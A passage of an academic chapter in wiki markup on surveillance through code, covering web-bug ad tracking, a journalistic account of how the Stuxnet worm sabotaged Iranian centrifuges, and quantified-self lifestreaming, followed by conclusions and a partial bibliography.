&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have been working on it simultaneously to build such a worm (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
